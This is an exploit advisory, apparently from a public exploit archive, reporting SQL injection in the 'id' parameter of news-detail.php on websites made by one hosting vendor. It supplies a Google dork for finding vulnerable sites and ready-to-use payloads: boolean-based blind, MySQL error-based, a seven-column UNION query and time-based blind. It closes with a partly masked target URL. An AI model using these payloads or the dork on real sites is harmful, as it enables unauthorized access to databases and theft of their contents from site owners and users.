_ _ _ _ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __ | '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ / | | | |_| | |_) | __/ | | | | | | | | | |_| |> < |_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\ |_____| # Exploit Title: SQL Injection # # Google Dork: "Website Created and Hosted By Triad" # # Date: 5/9/12 # # Author: ruben_linux # # Site : http://arealinux(dot)blogspot(dot)com(dot)es # http://www(dot)youtube(dot)com/user/rubenlinux ================================== Files affected : news-detail.php parameter: id ================== PoC-Exploit ================== Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=5' AND 6992=6992 AND 'kaiM'='kaiM Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=5' AND (SELECT 8596 FROM(SELECT COUNT(*),CONCAT(0x3a6974713a,(SELECT (CASE WHEN (8596=8596) THEN 1 ELSE 0 END)),0x3a6a6c763a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PzcT'='PzcT Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: id=5' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6974713a,0x4c6b50577255634a4c52,0x3a6a6c763a), NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=5' AND SLEEP(5) AND 'wZaG'='wZaG [+] http://www.******.com/news-detail.php?id=5[SQLi]